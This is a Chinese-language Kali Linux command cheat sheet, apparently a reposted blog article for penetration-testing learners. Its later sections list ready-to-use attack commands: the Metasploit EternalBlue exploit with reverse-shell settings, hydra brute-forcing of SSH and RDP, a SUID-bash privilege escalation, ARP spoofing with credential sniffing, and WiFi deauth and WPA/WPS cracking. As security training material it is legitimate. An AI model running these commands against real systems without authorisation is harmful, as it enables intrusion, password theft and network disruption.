目录
- 一、基础系统/目录操作
- 二、文件编辑/查看操作
- 三、网络基础操作
- 四、信息收集命令
- 五、端口/网段扫描命令
- 六、漏洞探测/利用基础(Metasploit示例)
- 七、密码破解命令
- 八、提权/本地渗透命令
- 九、嗅探抓包/流量分析
- 十、无线渗透命令
一、基础系统/目录操作
- ls — 列出当前目录文件/文件夹
- ls -l — 详细列出文件属性(权限、大小、修改时间)
- ls -a — 显示隐藏文件(包含.和..)
- ls -la — 详细显示所有文件(含隐藏)
- cd / — 切换到根目录
- cd .. — 切换到上一级目录
- cd ~ 或 cd — 切换到当前用户主目录
- cd - — 切换到上一次操作的目录
- pwd — 查看当前所在绝对路径
- mkdir test — 创建名为test的文件夹
- mkdir -p /a/b/c — 递归创建多级目录
- rm file — 删除单个文件
- rm -f file — 强制删除文件(不提示)
- rm -r dir — 递归删除文件夹及内部内容
危险命令:rm -rf / 或 rm -rf /* 会瞬间清空整个系统。永远先用 ls 确认路径,再执行带 -r 或 -rf 的删除。
- rm -rf dir — 强制递归删除(高危,谨慎使用)
- cp file /tmp/ — 复制文件到指定目录
- cp -r dir /tmp/ — 递归复制文件夹
- mv file /tmp/ — 移动文件到指定目录(也可用于重命名)
- mv oldname newname — 给文件/文件夹重命名
- touch newfile — 创建空文件
- chmod 777 file — 赋予所有用户读写执行权限
极度危险,生产环境几乎从不使用777。常见安全组合:文件 chmod 644,目录/可执行脚本 chmod 755。
- chmod 755 file — 所有者读写执行,其他用户读执行
- chown root:root file — 修改文件所属用户和组为root
- df -h — 查看磁盘空间(人性化显示)
- free -h — 查看内存/交换分区使用情况
二、文件编辑/查看操作
- cat file — 正序查看文件全部内容
- tac file — 倒序查看文件全部内容
- head file — 查看前10行
- head -n 20 file — 查看前20行
- tail file — 查看后10行
- tail -n 20 file — 查看后20行
- tail -f file — 实时监控文件变化(日志分析最常用)
- more file — 分页查看(空格/回车翻页)
- less file — 高级分页查看(支持上下翻页、/搜索)
- nano file — 简易文本编辑器
- vim file — 高级编辑器(按 i 编辑,Esc 退出编辑,:wq 保存退出,:q! 强制退出)
- grep "keyword" file — 在文件中搜索关键词
- grep -i "keyword" file — 忽略大小写搜索
- grep -r "keyword" dir — 递归搜索整个目录
- wc -l file — 统计文件行数
三、网络基础操作
- ifconfig — 查看/配置网络接口(旧命令)
- ip a 或 ip addr — 现代推荐命令,查看网络接口详情
- ip addr add 192.168.1.100/24 dev eth0 — 临时添加IP(重启丢失)
网卡名说明:eth0 仅为示例,现代系统常见 ens33/enp03/wlan0 等,用 ip link 查看真实名称。很多工具支持 -i any(所有接口)。永久配置建议用 nmcli 或 Netplan。
- route -n — 查看路由表
- ip route — 现代路由查看/配置命令
- ping ip — 测试连通性(默认无限发送,按 Ctrl+C 停止)
- ping -c 4 ip — 发送4个包后停止
- ping -i 0.5 ip — 每0.5秒发一个包(快速探测)
- netstat -tulnp — 查看监听端口及进程(过时,推荐 ss)
- netstat -an — 查看所有连接(过时)
- ss -tulnp — 现代首选,快速查看监听端口
口诀:新系统一律用 ss!
- arp -a — 查看ARP缓存表
- arp -s ip mac — 静态绑定IP和MAC
- hostname — 查看主机名
- hostname newname — 临时修改主机名
- curl url — 访问URL并显示内容
- wget url — 下载文件到当前目录
- wget -O newname url — 下载并自定义文件名
- curl ifconfig.me — 查看本机公网IP(备选:curl icanhazip.com 或 curl ip.sb)
- telnet ip port — 测试指定端口是否开放
四、信息收集命令
- uname -a — 查看内核版本、系统架构、主机名等
- cat /etc/issue — 查看系统发行版简要信息
- cat /etc/os-release — 详细查看系统版本信息(推荐)
- whoami — 查看当前登录用户名
- who — 查看当前所有登录系统的用户
- w — 查看当前登录用户及正在执行的操作
- last — 查看系统登录历史记录
- ps -ef — 查看所有运行的进程(详细信息)
- ps aux — 以BSD格式查看所有进程
- top — 实时监控系统进程(资源占用、PID等,按 q 退出)
- pstree — 以树形结构查看进程关系
- netstat -antp — 查看所有TCP连接及对应进程(过时,建议用 ss)
- find / -name "*.sh" — 从根目录搜索所有.sh后缀的文件
提示:从根目录搜索很慢,建议指定路径如 find /home -name ...
- find / -perm -4000 -type f 2>/dev/null — 搜索SUID权限文件(常用于提权线索)
- arp-scan -l 或 arp-scan --localnet — 扫描局域网存活主机(Kali常用)
- fping -g 192.168.1.0/24 — 快速扫描C段存活主机
- cat /etc/passwd — 查看系统所有用户信息
- cat /etc/group — 查看系统所有用户组信息
- cat /var/log/auth.log — 查看系统认证日志(登录、sudo操作等)
- lsof -i:80 — 查看占用80端口的进程
五、端口/网段扫描命令
- nmap ip — 默认扫描目标(1000个常用端口)
- nmap -sn 192.168.1.0/24 — 仅扫描网段存活主机(无端口扫描)
- nmap -p 80 ip — 仅扫描80端口
- nmap -p 1-65535 ip — 扫描所有端口
- nmap -p 80,443,22 ip — 扫描指定多个端口
- nmap -sT ip — TCP全连接扫描(易被检测)
- nmap -sS ip — TCP SYN半开放扫描(隐蔽,默认推荐)
区别:-sS 只发SYN,不完成握手,不易被记录;-sT 完整握手,像正常访问。
- nmap -sU ip — UDP端口扫描
- nmap -sV ip — 扫描端口并探测服务版本信息
- nmap -O ip — 探测目标操作系统类型(大写O)
- nmap -A ip — 全面扫描(存活+端口+版本+OS+脚本)
- nmap -T4 ip — 提高扫描速度(-T0 最慢,-T5 最快)
- nmap -oN result.txt ip — 保存为普通文本
- nmap -oX result.xml ip — 保存为XML格式
- nmap --script=vuln ip — 加载漏洞脚本探测已知漏洞
2026年提示:nmap脚本引擎更新频繁,vuln脚本false positive较多,建议结合-sV使用。
- nmap --script=brute ip — 加载暴力破解脚本(弱口令尝试)
- nmap -Pn ip — 跳过主机存活检测,直接扫描端口(目标禁ping时必加)
- nmap -D RND:10 ip — 使用随机10个假IP欺骗源地址(隐藏真实IP)
- masscan 192.168.1.0/24 -p 80,443 — 超高速端口扫描(比nmap快得多)
- zenmap — 打开Nmap图形化界面(适合新手)
六、漏洞探测/利用基础(Metasploit示例)
- msfconsole 或 msfconsole -q — 打开Metasploit控制台(-q 安静模式推荐)
- search ms17-010 — 搜索指定漏洞模块
- use exploit/windows/smb/ms17_010_eternalblue — 加载漏洞利用模块
- show options — 查看模块所需参数
- set RHOSTS ip — 设置目标IP
- set LHOST ip — 设置本机攻击IP(反弹shell用)
- set LPORT 4444 — 设置监听端口
- exploit 或 run — 执行漏洞利用
- back — 退出当前模块
- sessions -l — 查看所有反弹shell会话
- sessions -i 1 — 进入编号1的shell会话
- sessions -k 1 — 关闭编号1的会话
- nessusd start — 启动Nessus服务(旧写法)
- nessuscli scan --launch 123 — 启动指定Nessus扫描任务
注意:Nessus新版本多用systemctl管理或web界面操作。
七、密码破解命令
- hydra -l root -P pass.txt ssh://ip — 破解SSH(用户名+密码字典)
提示:在线暴力易被封IP,可加 -t 4 限制线程。
- hydra -L user.txt -P pass.txt rdp://ip — 破解RDP
- hydra -l admin -P pass.txt http-get://ip — 破解HTTP GET登录
- hydra -l admin -P pass.txt mysql://ip — 破解MySQL
- john --wordlist=pass.txt passwd — John the Ripper 破解系统密码文件
- john --show passwd — 查看已破解密码
- hashcat -m 0 hash.txt pass.txt — Hashcat破解MD5
- hashcat -m 1000 hash.txt pass.txt — 破解NTLM
- crunch 6 8 0123456789 -o 6-8num.txt — 生成6-8位纯数字字典
- crunch 8 8 abc123 -o 8char.txt — 生成8位字母+数字字典
- cewl url -w webpass.txt — 从网站爬取内容生成专属字典
- medusa -u root -P pass.txt -h ip -M ssh — 美杜莎破解SSH(速度快)
- sqlmap -u url --forms — 检测SQL注入并尝试破解数据库
- fcrackzip -D -p pass.txt test.zip — 破解ZIP压缩包
- 7z x test.zip -p123456 — 用已知密码解压加密ZIP
八、提权/本地渗透命令
- sudo -l — 查看当前用户可用的sudo命令(提权核心)
- sudo su — 以root权限切换用户
- su root — 切换到root(需root密码)
- id — 查看当前用户UID、GID、组信息
- find / -type f -perm -4000 2>/dev/null — 搜索SUID文件
常见可利用:find、vim、nano、less、more、cp 等(视系统版本而定)
- find / -type f -perm -2000 2>/dev/null — 搜索SGID文件
- chkrootkit — 检测rootkit后门
- unshare -rm /bin/bash — 利用内核漏洞临时提权(老漏洞,成功率低)
- cp /bin/bash /tmp/bash; chmod 4755 /tmp/bash — 制作SUID bash
- ./tmp/bash -p — 执行SUID bash提权
现代防护:很多系统有no-new-privs等机制,成功率大幅下降,仅学习参考。
- ps aux | grep root — 查看root进程(寻找提权突破口)
- cat /proc/cmdline — 查看启动参数(找提权线索)
- lsmod — 查看加载的内核模块
- exploit-db — 打开Exploit-DB漏洞库(Kali内置)
九、嗅探抓包/流量分析
- tcpdump -i any — 在所有接口抓包(推荐any而非eth0)
- tcpdump -i any -w cap.pcap — 抓包保存为pcap文件
- tcpdump -i any port 80 — 仅抓80端口流量
- wireshark — 打开图形化抓包工具
- tshark -i any — Wireshark命令行版
- arpspoof -i any -t 192.168.1.100 192.168.1.1 — ARP欺骗
2026年推荐:bettercap(功能更全,支持HTTPS/DNS等中间人攻击)
- driftnet -i any — 嗅探局域网图片流量
- urlsnarf -i any — 嗅探URL访问记录
- dsniff -i any — 综合嗅探(捕获FTP/HTTP/SMB凭证)
- ngrep -d any "password" — 过滤包含关键词的网络流
十、无线渗透命令
- airmon-ng start wlan0 — 开启监听模式(网卡变为wlan0mon)
- airmon-ng stop wlan0mon — 关闭监听模式
- airodump-ng wlan0mon — 扫描周围WiFi
- airodump-ng -c 6 --bssid XX:XX:XX:XX:XX:XX -w wifi wlan0mon — 定向抓包
- aireplay-ng --deauth 0 -a XX:XX:XX:XX:XX:XX wlan0mon — 无限deauth断网攻击
- aircrack-ng -w pass.txt wifi-01.cap — 字典破解WPA/WPA2
- reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vW — 破解WPS
- wash -i wlan0mon — 扫描开启WPS的设备
- kismet — 无线流量嗅探/扫描(图形化)
- bully -i wlan0mon -b XX:XX:XX:XX:XX:XX — WPS破解(成功率较高)
提示:运行前常需 airmon-ng check kill 杀干扰进程
如果未安装kali,可以参考作者另一篇文章:https://www.cnblogs.com/xize766/articles/19548059/vm-kali-install
温馨提示:本文仅供学习参考,任何违法行为均与作者无关。
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! |